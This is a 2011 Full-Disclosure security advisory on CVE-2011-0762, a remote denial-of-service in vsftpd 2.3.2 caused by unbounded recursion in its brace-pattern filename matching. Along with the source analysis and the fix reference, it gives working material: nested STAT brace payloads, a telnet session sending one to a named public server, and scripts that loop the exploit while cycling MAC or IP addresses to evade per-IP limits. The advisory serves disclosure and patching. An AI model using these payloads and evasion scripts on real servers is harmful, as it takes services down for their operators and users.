[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] vsftpd 2.3.2 remote denial-of-servic



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ vsftpd 2.3.2 remote denial-of-service ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 23.12.2010
- - Pub.: 01.03.2011

CVE: CVE-2011-0762
CERT: VU#590604

Fix: vsftpd 2.3.4 (15.02.2011)

Affected Software (verified):
- - vsftpd 2.3.2 (NetBSD 5.1)
- - vsftpd 2.3.0 (Ubuntu 10.10)

Affected Servers (19.02.2011):
- - ftp.gnu.org (2.0.6)
- - ftp.kernel.org (2.2.2)
- - ftpgen.wip4.adobe.com (2.3.2)
- - ftp.oracle.com (2.0.5)
- - ftp.freebsd.org (2.2.0)
- - more more more...

Original URL:
http://securityreason.com/achievement_securityalert/95


- --- 0.Description ---
vsftpd is a GPL licensed FTP server for UNIX systems, including Linux.
It is secure and extremely fast. It is stable. Don't take my word for
it, though. Below, we will see evidence supporting all three assertions.
We will also see a list of a few important sites which are happily using
vsftpd. This demonstrates vsftpd is a mature and trusted solution.


- --- 1. vsftpd 2.3.2 remote denial-of-service ---
As we can read in "ls.c" vsftpd file...

- ---
...
   * parsing and handling. There is broad potential for any given fnmatch(3)
   * implementation to be buggy.
   *
   * Currently supported pattern(s):
   * - any number of wildcards, "*" or "?"
   * - {,} syntax (not nested)
...
- ---

That true but anyone who has changed ftpd bsd daemon to vsftpd to
protect before CVE-2010-2632 (glob(3) resource exhaustion) are in
danger. Any code with huge complexity, could allow of denial of service
if an affected system received vulnerable pattern. This bug allow to
disable wide range of servers. To designate vulnerable servers, we have
to used pattern with medium complexity.

- -Example affected server---
cx@cx64:~$ telnet ftp.gnu.org 21
Trying 140.186.70.20...
Connected to ftp.gnu.org.
Escape character is '^]'.
220 GNU FTP server ready.
USER anonymous
PASS abra@xxxxxxxxxxx
STAT {{*},....}
...
230 Login successful.
230 Already logged in.
213-Status follows:

- -Example affected server---

Execution time may have wide range depending on the length of pattern:
empty     2388 97.3  0.0  37980  1352 ?        R    Dec23 222:42
/usr/sbin/vsftpd

222m and counting...

so any next {{*},Recursion} will increment the complexity. Let's see
what is wrong and where. In vsftpd the main problem exists in ls.c.

- -ls.c--
int
vsf_filename_passes_filter(const struct mystr* p_filename_str,
                           const struct mystr* p_filter_str)
{
...
else if (last_token == '{')
    {
      struct str_locate_result end_brace =
        str_locate_char(&filter_remain_str, '}');
      must_match_at_current_pos = 1;
      if (end_brace.found)
      {
        str_split_char(&filter_remain_str, &temp_str, '}');
        str_copy(&brace_list_str, &filter_remain_str);
        str_copy(&filter_remain_str, &temp_str);
        str_split_char(&brace_list_str, &temp_str, ',');
        while (!str_isempty(&brace_list_str))
        {
          str_copy(&new_filter_str, &brace_list_str);
          str_append_str(&new_filter_str, &filter_remain_str);
          if (vsf_filename_passes_filter(&name_remain_str,
&new_filter_str)) <===== LIMIT THIS CALL
          {
            ret = 1;
...
- -ls.c--

Code:
 if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str))
<===== LIMIT THIS CALL

this call should be limited, and in version 2.3.4 has been fixed.

A simple way to show growth in computing power ...
(1*2*3*4*...*count(vsf_filename_passes_filter complexity)) ==
count(vsf_filename_passes_filter complexity)!

Compare two patterns and see different between

STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}

and add next {*,...}

STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}}

and in the end, compare:
STAT
{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

hovever in vsftpd, command lenght is allowed to 4096 bytes. So it's no
problem to create request with a huge complexity

To bypass max_per_ip, use ISP with dynamic ip. Disconnect and connect
(example for bt mobile phone):

cx@cx64:~$ hciconfig hci0 down
cx@cx64:~$ hciconfig hci0 up

and connect again.

- ---PoC---
Download vspoc232.c and compile, then create some script to changing
your ip (netbsd51: pcn0)

- -change.sh; change ip by mac(local dos)---
#!/bin/sh
# example change ip script
ifconfig pcn0 down
/etc/rc.d/dhclient stop
ifconfig pcn0 link 00:0c:0c:0c:$1:$2 active
dhclient pcn0
/etc/rc.d/dhclient start
ifconfig pcn0 up
- -change.sh; change ip by mac(local dos)---

or use mobile phone via bluetooth.

- -change.sh; conn-diss bt---
#!/bin/sh
# example change ip script
hciconfig hci0 down
hciconfig hci0 up
- -change.sh; conn-diss bt---

then run.sh

- -run.sh---
#!/bin/sh
# vsftpd exploit with change ip option
# sh run.sh [ip] [port] [user] [password]

mac=0;
echo "vsftpd exploit";
while [ $mac != 0xff ]; do {
mac=`expr $mac + 1`;
./vspoc232 $1 $2 $3 $4
sh ./change.sh 66 $mac
} done
- -run.sh---

then run and see result

sh ./run.sh 172.5.0.129 21 cx pass

on my local netbsd5.1 (default instalation),  we reach to limit and no
more new processes (DoS).

Result (forked dos):
cx@cx64:~$

USER     PID %CPU %MEM   VSZ   RSS TTY   STAT STARTED    TIME COMMAND
...
root     149  0.0  0.1  2932  1152 ?     Is    2:31AM 0:00.01 vsftpd
/usr/pkg/e
cx       150  0.0  0.2  2956  1592 ?     R     2:32AM 0:01.22 vsftpd
/usr/pkg/e
cx       160  0.3  0.2  2956  1592 ?     R     2:31AM 0:01.48 vsftpd
/usr/pkg/e
cx       161  0.2  0.2  2956  1592 ?     R     2:32AM 0:01.03 vsftpd
/usr/pkg/e
root     258  0.0  0.1  2932  1152 ?     Is    2:32AM 0:00.01 vsftpd
/usr/pkg/e
root     278  0.0  0.1  2932  1152 ?     Is    2:32AM 0:00.02 vsftpd
/usr/pkg/e
cx       289  0.0  0.2  2956  1592 ?     R     2:32AM 0:00.97 vsftpd
/usr/pkg/e
cx       321  0.0  0.2  2956  1592 ?     R     2:32AM 0:00.85 vsftpd
/usr/pkg/e
...
root    5139  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd
/usr/pkg/e
root    5145  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.02 vsftpd
/usr/pkg/e
root    5156  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd
/usr/pkg/e
root    5159  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd
/usr/pkg/e
cx      5170  0.0  0.2  2956  1608 ?     R     2:35AM 0:00.44 vsftpd
/usr/pkg/e
root    5190  0.0  0.1  2932  1168 ?     Is    2:35AM 0:00.01 vsftpd
/usr/pkg/e
cx      5192  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.39 vsftpd
/usr/pkg/e
cx      5242  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.39 vsftpd
/usr/pkg/e
cx      5250  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.49 vsftpd
/usr/pkg/e
root    7199  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd
/usr/pkg/e
cx      7248  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.63 vsftpd
/usr/pkg/e
root    7256  0.0  0.1  2932  1168 ?     Is    2:35AM 0:00.01 vsftpd
/usr/pkg/e
root    7276  0.0  0.1  2932  1168 ?     Is    2:35AM 0:00.01 vsftpd
/usr/pkg/e

bypassing max_per_ip we have created more than 5000 vsftdp children
processes.

cx@cx64:~$ telnet 172.5.0.129 21
Trying 172.5.0.129...
Connected to 172.5.0.129.
Escape character is '^]'.
500 OOPS: fork
Connection closed by foreign host.


- --- 2. Exploit ---
http://cxib.net/stuff/vspoc232.c


- --- 3. Fix ---
ftp://vsftpd.beasts.org/users/cevans/untar/vsftpd-2.3.4/Changelog
ftp://vsftpd.beasts.org/users/cevans/vsftpd-2.3.4.tar.gz
ftp://vsftpd.beasts.org/users/cevans/vsftpd-2.3.4.tar.gz.asc


- --- 4. Greets ---
Chris Evans, sp3x, Infospec


- --- 5. Contact ---
Author: Maksymilian Arciemowicz [ SecurityReason.com ]

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://cxib.net/

- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@xxxxxxxx>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJNbOn+AAoJEIO8+dzW5bUwtjwP/RsnKDwj3HNfEEai4kR70GkQ
+iTXHud27RrTwsVz8i3ZXQVrNf30ASE8V06BXjDGteOT2SkexSRQXDf0TUgvPvOo
E0nMpaLfLG0REtKXLn93TJ6sEewmBTT8WuK0QnuR+Z2rBJrfHgnrETMg2rJo14by
FTK5SMHNe4NnvxS2GePPEuqEDxxqO/XK36OAVQLCX5tjn0p9G+9KA9Yxa4B17DOn
mpMP8svvU1IYwfPMleNIJSOm3GtsAY5+bvsbBK70guOjCkgyzSwvAZZo/+lRlMTd
GvZdJhBEJFM9xo+jI4UHM8RO7AKibHZE/SuSSAXWp5t1/jd2lETZBynwp722Bbld
qg9FRSyvn+B6qhdNnXj/kpgT+Kiu738g6hQheqMBFiaQP/TxId/Bp3g4pEunrPHH
+ASduUTSsI+g5eTHMEmdVOCxIncOwdsalM9F9sYfpn9n5x177m2p2hcIUjCSd9fG
IqceJPYsn+hWvrig5kM4CRjNZeIRkakcMzFFh1Z/9dhjsSaM8Y+WUqfBu0Sj6gKS
wCaAOnh5SG92tH0LQAhTUL+7blEfQEeQ8V0tabrdhRnHBV1jjn4VhrpKXjEhGxtI
AbAegzqfZXj9b+83HuvCc19Du/JO+/8+ykQlobtWLAX6y3i4JDYFtOsIV+JdksQs
N34/yWMEqFSq2eAKLvu3
=UvoV
-----END PGP SIGNATURE-----

Attachment: 0xD6E5B530.asc
Description: application/pgp-keys

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/